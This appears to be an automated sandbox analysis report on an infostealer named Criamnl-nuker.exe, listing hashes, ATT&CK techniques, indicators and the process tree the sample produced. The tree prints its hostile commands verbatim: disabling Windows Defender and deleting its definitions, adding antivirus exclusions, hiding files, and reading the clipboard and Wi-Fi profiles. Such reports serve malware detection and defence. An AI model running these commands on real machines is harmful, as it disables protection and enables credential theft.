525a89a83b5e24f6c67d5e4f8dbf6ea4883b516c52c9103581782bacac921bfb

Analysis

max time kernel
98s
max time network
141s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28-12-2024 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Criamnl-nuker.exe
Size

6.9MB
MD5

f76e0b179086ea8610a7b8861a2e6a32
SHA1

485f0f1db583e266db1a56e08072df118685268e
SHA256

525a89a83b5e24f6c67d5e4f8dbf6ea4883b516c52c9103581782bacac921bfb
SHA512

458928f553a540b5731797dfcb795ffd0485d93c478fb5cbdb781ed073ebb914ca234aad6f7d7841b3e79b80ef029437dc8cad74be598f9ef6ee051bd0e6e7b1
SSDEEP

98304:PiDjWM8JEE1FKXamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIFS:Pi0XeNTfm/pf+xk4dWRpmrbW3jmrq

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1928	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2780	powershell.exe
3364	powershell.exe
5048	powershell.exe
3796	powershell.exe
2440	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Criamnl-nuker.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2756	cmd.exe
3672	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1656	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe
3124	Criamnl-nuker.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4016	tasklist.exe
4556	tasklist.exe
3152	tasklist.exe
4364	tasklist.exe
3028	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4540	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000046137-21.dat	upx
behavioral1/memory/3124-25-0x00007FFFB3F70000-0x00007FFFB4558000-memory.dmp	upx
behavioral1/files/0x002800000004612a-27.dat	upx
behavioral1/files/0x0028000000046135-29.dat	upx
behavioral1/memory/3124-48-0x00007FFFCCB30000-0x00007FFFCCB3F000-memory.dmp	upx
behavioral1/files/0x0028000000046131-47.dat	upx
behavioral1/files/0x0028000000046130-46.dat	upx
behavioral1/files/0x002800000004612f-45.dat	upx
behavioral1/files/0x002800000004612e-44.dat	upx
behavioral1/files/0x002800000004612d-43.dat	upx
behavioral1/files/0x002800000004612c-42.dat	upx
behavioral1/files/0x002800000004612b-41.dat	upx
behavioral1/files/0x0028000000046129-40.dat	upx
behavioral1/files/0x002800000004613c-39.dat	upx
behavioral1/files/0x002800000004613b-38.dat	upx
behavioral1/files/0x002800000004613a-37.dat	upx
behavioral1/files/0x0028000000046136-34.dat	upx
behavioral1/files/0x0028000000046134-33.dat	upx
behavioral1/memory/3124-31-0x00007FFFC3140000-0x00007FFFC3164000-memory.dmp	upx
behavioral1/memory/3124-54-0x00007FFFC2B30000-0x00007FFFC2B5D000-memory.dmp	upx
behavioral1/memory/3124-56-0x00007FFFCA400000-0x00007FFFCA419000-memory.dmp	upx
behavioral1/memory/3124-58-0x00007FFFC2B00000-0x00007FFFC2B23000-memory.dmp	upx
behavioral1/memory/3124-60-0x00007FFFB3DF0000-0x00007FFFB3F63000-memory.dmp	upx
behavioral1/memory/3124-62-0x00007FFFC2AE0000-0x00007FFFC2AF9000-memory.dmp	upx
behavioral1/memory/3124-64-0x00007FFFC3840000-0x00007FFFC384D000-memory.dmp	upx
behavioral1/memory/3124-67-0x00007FFFC2AB0000-0x00007FFFC2ADE000-memory.dmp	upx
behavioral1/memory/3124-66-0x00007FFFB3F70000-0x00007FFFB4558000-memory.dmp	upx
behavioral1/memory/3124-69-0x00007FFFB3560000-0x00007FFFB3618000-memory.dmp	upx
behavioral1/memory/3124-73-0x00007FFFB31E0000-0x00007FFFB3555000-memory.dmp	upx
behavioral1/memory/3124-79-0x00007FFFC3220000-0x00007FFFC322D000-memory.dmp	upx
behavioral1/memory/3124-77-0x00007FFFC2D10000-0x00007FFFC2D24000-memory.dmp	upx
behavioral1/memory/3124-76-0x00007FFFC2B30000-0x00007FFFC2B5D000-memory.dmp	upx
behavioral1/memory/3124-72-0x00007FFFC3140000-0x00007FFFC3164000-memory.dmp	upx
behavioral1/memory/3124-82-0x00007FFFB2DE0000-0x00007FFFB2EFC000-memory.dmp	upx
behavioral1/memory/3124-81-0x00007FFFC2B00000-0x00007FFFC2B23000-memory.dmp	upx
behavioral1/memory/3124-103-0x00007FFFB3DF0000-0x00007FFFB3F63000-memory.dmp	upx
behavioral1/memory/3124-119-0x00007FFFC2AE0000-0x00007FFFC2AF9000-memory.dmp	upx
behavioral1/memory/3124-263-0x00007FFFC2AB0000-0x00007FFFC2ADE000-memory.dmp	upx
behavioral1/memory/3124-276-0x00007FFFB3560000-0x00007FFFB3618000-memory.dmp	upx
behavioral1/memory/3124-292-0x00007FFFB31E0000-0x00007FFFB3555000-memory.dmp	upx
behavioral1/memory/3124-304-0x00007FFFB3F70000-0x00007FFFB4558000-memory.dmp	upx
behavioral1/memory/3124-310-0x00007FFFB3DF0000-0x00007FFFB3F63000-memory.dmp	upx
behavioral1/memory/3124-305-0x00007FFFC3140000-0x00007FFFC3164000-memory.dmp	upx
behavioral1/memory/3124-344-0x00007FFFB2DE0000-0x00007FFFB2EFC000-memory.dmp	upx
behavioral1/memory/3124-350-0x00007FFFC2B00000-0x00007FFFC2B23000-memory.dmp	upx
behavioral1/memory/3124-355-0x00007FFFB3560000-0x00007FFFB3618000-memory.dmp	upx
behavioral1/memory/3124-354-0x00007FFFC2AB0000-0x00007FFFC2ADE000-memory.dmp	upx
behavioral1/memory/3124-353-0x00007FFFC3840000-0x00007FFFC384D000-memory.dmp	upx
behavioral1/memory/3124-352-0x00007FFFC2AE0000-0x00007FFFC2AF9000-memory.dmp	upx
behavioral1/memory/3124-351-0x00007FFFB3DF0000-0x00007FFFB3F63000-memory.dmp	upx
behavioral1/memory/3124-349-0x00007FFFCA400000-0x00007FFFCA419000-memory.dmp	upx
behavioral1/memory/3124-348-0x00007FFFC2B30000-0x00007FFFC2B5D000-memory.dmp	upx
behavioral1/memory/3124-346-0x00007FFFC3140000-0x00007FFFC3164000-memory.dmp	upx
behavioral1/memory/3124-345-0x00007FFFCCB30000-0x00007FFFCCB3F000-memory.dmp	upx
behavioral1/memory/3124-341-0x00007FFFB31E0000-0x00007FFFB3555000-memory.dmp	upx
behavioral1/memory/3124-347-0x00007FFFB3F70000-0x00007FFFB4558000-memory.dmp	upx
behavioral1/memory/3124-343-0x00007FFFC3220000-0x00007FFFC322D000-memory.dmp	upx
behavioral1/memory/3124-342-0x00007FFFC2D10000-0x00007FFFC2D24000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4148	cmd.exe
240	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2460	cmd.exe
3932	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2572	WMIC.exe
2456	WMIC.exe
4364	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2456	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
240	PING.EXE

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
3044	WMIC.exe
3044	WMIC.exe
3044	WMIC.exe
3044	WMIC.exe
3796	powershell.exe
2780	powershell.exe
3796	powershell.exe
2780	powershell.exe
2572	WMIC.exe
2572	WMIC.exe
2572	WMIC.exe
2572	WMIC.exe
2456	WMIC.exe
2456	WMIC.exe
2456	WMIC.exe
2456	WMIC.exe
2440	powershell.exe
2440	powershell.exe
4032	WMIC.exe
4032	WMIC.exe
4032	WMIC.exe
4032	WMIC.exe
3672	powershell.exe
3672	powershell.exe
3672	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
3364	powershell.exe
3364	powershell.exe
3364	powershell.exe
3840	powershell.exe
3840	powershell.exe
1760	WMIC.exe
1760	WMIC.exe
1760	WMIC.exe
1760	WMIC.exe
4556	WMIC.exe
4556	WMIC.exe
4556	WMIC.exe
4556	WMIC.exe
2756	WMIC.exe
2756	WMIC.exe
2756	WMIC.exe
2756	WMIC.exe
5048	powershell.exe
5048	powershell.exe
4364	WMIC.exe
4364	WMIC.exe
4364	WMIC.exe
4364	WMIC.exe
3120	powershell.exe
3120	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3044	WMIC.exe
Token: SeSecurityPrivilege	3044	WMIC.exe
Token: SeTakeOwnershipPrivilege	3044	WMIC.exe
Token: SeLoadDriverPrivilege	3044	WMIC.exe
Token: SeSystemProfilePrivilege	3044	WMIC.exe
Token: SeSystemtimePrivilege	3044	WMIC.exe
Token: SeProfSingleProcessPrivilege	3044	WMIC.exe
Token: SeIncBasePriorityPrivilege	3044	WMIC.exe
Token: SeCreatePagefilePrivilege	3044	WMIC.exe
Token: SeBackupPrivilege	3044	WMIC.exe
Token: SeRestorePrivilege	3044	WMIC.exe
Token: SeShutdownPrivilege	3044	WMIC.exe
Token: SeDebugPrivilege	3044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3044	WMIC.exe
Token: SeRemoteShutdownPrivilege	3044	WMIC.exe
Token: SeUndockPrivilege	3044	WMIC.exe
Token: SeManageVolumePrivilege	3044	WMIC.exe
Token: 33	3044	WMIC.exe
Token: 34	3044	WMIC.exe
Token: 35	3044	WMIC.exe
Token: 36	3044	WMIC.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeIncreaseQuotaPrivilege	3044	WMIC.exe
Token: SeSecurityPrivilege	3044	WMIC.exe
Token: SeTakeOwnershipPrivilege	3044	WMIC.exe
Token: SeLoadDriverPrivilege	3044	WMIC.exe
Token: SeSystemProfilePrivilege	3044	WMIC.exe
Token: SeSystemtimePrivilege	3044	WMIC.exe
Token: SeProfSingleProcessPrivilege	3044	WMIC.exe
Token: SeIncBasePriorityPrivilege	3044	WMIC.exe
Token: SeCreatePagefilePrivilege	3044	WMIC.exe
Token: SeBackupPrivilege	3044	WMIC.exe
Token: SeRestorePrivilege	3044	WMIC.exe
Token: SeShutdownPrivilege	3044	WMIC.exe
Token: SeDebugPrivilege	3044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3044	WMIC.exe
Token: SeRemoteShutdownPrivilege	3044	WMIC.exe
Token: SeUndockPrivilege	3044	WMIC.exe
Token: SeManageVolumePrivilege	3044	WMIC.exe
Token: 33	3044	WMIC.exe
Token: 34	3044	WMIC.exe
Token: 35	3044	WMIC.exe
Token: 36	3044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3796	powershell.exe
Token: SeSecurityPrivilege	3796	powershell.exe
Token: SeTakeOwnershipPrivilege	3796	powershell.exe
Token: SeLoadDriverPrivilege	3796	powershell.exe
Token: SeSystemProfilePrivilege	3796	powershell.exe
Token: SeSystemtimePrivilege	3796	powershell.exe
Token: SeProfSingleProcessPrivilege	3796	powershell.exe
Token: SeIncBasePriorityPrivilege	3796	powershell.exe
Token: SeCreatePagefilePrivilege	3796	powershell.exe
Token: SeBackupPrivilege	3796	powershell.exe
Token: SeRestorePrivilege	3796	powershell.exe
Token: SeShutdownPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeSystemEnvironmentPrivilege	3796	powershell.exe
Token: SeRemoteShutdownPrivilege	3796	powershell.exe
Token: SeUndockPrivilege	3796	powershell.exe
Token: SeManageVolumePrivilege	3796	powershell.exe
Token: 33	3796	powershell.exe
Token: 34	3796	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3292 wrote to memory of 3124	3292	Criamnl-nuker.exe	81
PID 3292 wrote to memory of 3124	3292	Criamnl-nuker.exe	81
PID 3124 wrote to memory of 4088	3124	Criamnl-nuker.exe	83
PID 3124 wrote to memory of 4088	3124	Criamnl-nuker.exe	83
PID 3124 wrote to memory of 3624	3124	Criamnl-nuker.exe	84
PID 3124 wrote to memory of 3624	3124	Criamnl-nuker.exe	84
PID 3124 wrote to memory of 4164	3124	Criamnl-nuker.exe	85
PID 3124 wrote to memory of 4164	3124	Criamnl-nuker.exe	85
PID 3124 wrote to memory of 2060	3124	Criamnl-nuker.exe	88
PID 3124 wrote to memory of 2060	3124	Criamnl-nuker.exe	88
PID 3124 wrote to memory of 1980	3124	Criamnl-nuker.exe	91
PID 3124 wrote to memory of 1980	3124	Criamnl-nuker.exe	91
PID 2060 wrote to memory of 4016	2060	cmd.exe	93
PID 2060 wrote to memory of 4016	2060	cmd.exe	93
PID 4088 wrote to memory of 3796	4088	cmd.exe	94
PID 4088 wrote to memory of 3796	4088	cmd.exe	94
PID 4164 wrote to memory of 3116	4164	cmd.exe	95
PID 4164 wrote to memory of 3116	4164	cmd.exe	95
PID 1980 wrote to memory of 3044	1980	cmd.exe	96
PID 1980 wrote to memory of 3044	1980	cmd.exe	96
PID 3624 wrote to memory of 2780	3624	cmd.exe	97
PID 3624 wrote to memory of 2780	3624	cmd.exe	97
PID 3124 wrote to memory of 2708	3124	Criamnl-nuker.exe	100
PID 3124 wrote to memory of 2708	3124	Criamnl-nuker.exe	100
PID 2708 wrote to memory of 564	2708	cmd.exe	102
PID 2708 wrote to memory of 564	2708	cmd.exe	102
PID 3124 wrote to memory of 2052	3124	Criamnl-nuker.exe	103
PID 3124 wrote to memory of 2052	3124	Criamnl-nuker.exe	103
PID 2052 wrote to memory of 1964	2052	cmd.exe	105
PID 2052 wrote to memory of 1964	2052	cmd.exe	105
PID 3124 wrote to memory of 4396	3124	Criamnl-nuker.exe	106
PID 3124 wrote to memory of 4396	3124	Criamnl-nuker.exe	106
PID 4396 wrote to memory of 2572	4396	cmd.exe	145
PID 4396 wrote to memory of 2572	4396	cmd.exe	145
PID 3124 wrote to memory of 1512	3124	Criamnl-nuker.exe	109
PID 3124 wrote to memory of 1512	3124	Criamnl-nuker.exe	109
PID 1512 wrote to memory of 2456	1512	cmd.exe	142
PID 1512 wrote to memory of 2456	1512	cmd.exe	142
PID 3124 wrote to memory of 4540	3124	Criamnl-nuker.exe	112
PID 3124 wrote to memory of 4540	3124	Criamnl-nuker.exe	112
PID 3124 wrote to memory of 3848	3124	Criamnl-nuker.exe	113
PID 3124 wrote to memory of 3848	3124	Criamnl-nuker.exe	113
PID 4540 wrote to memory of 4200	4540	cmd.exe	116
PID 4540 wrote to memory of 4200	4540	cmd.exe	116
PID 3848 wrote to memory of 2440	3848	cmd.exe	117
PID 3848 wrote to memory of 2440	3848	cmd.exe	117
PID 3124 wrote to memory of 4592	3124	Criamnl-nuker.exe	118
PID 3124 wrote to memory of 4592	3124	Criamnl-nuker.exe	118
PID 3124 wrote to memory of 5048	3124	Criamnl-nuker.exe	119
PID 3124 wrote to memory of 5048	3124	Criamnl-nuker.exe	119
PID 4592 wrote to memory of 4556	4592	cmd.exe	122
PID 4592 wrote to memory of 4556	4592	cmd.exe	122
PID 3124 wrote to memory of 4080	3124	Criamnl-nuker.exe	123
PID 3124 wrote to memory of 4080	3124	Criamnl-nuker.exe	123
PID 5048 wrote to memory of 3152	5048	cmd.exe	124
PID 5048 wrote to memory of 3152	5048	cmd.exe	124
PID 3124 wrote to memory of 2756	3124	Criamnl-nuker.exe	126
PID 3124 wrote to memory of 2756	3124	Criamnl-nuker.exe	126
PID 3124 wrote to memory of 2796	3124	Criamnl-nuker.exe	128
PID 3124 wrote to memory of 2796	3124	Criamnl-nuker.exe	128
PID 3124 wrote to memory of 4176	3124	Criamnl-nuker.exe	129
PID 3124 wrote to memory of 4176	3124	Criamnl-nuker.exe	129
PID 3124 wrote to memory of 2460	3124	Criamnl-nuker.exe	131
PID 3124 wrote to memory of 2460	3124	Criamnl-nuker.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4200	attrib.exe
1632	attrib.exe
116	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe
"C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3292
- C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe
  "C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2780
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error', 0, 'Error', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error', 0, 'Error', 32+16);close()"
      4⤵
      PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Criamnl-nuker.exe"
      4⤵
      Views/modifies file attributes
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ‏‌.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ‏‌.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4592
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5048
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4080
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2796
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4176
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2460
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2580
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3820
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
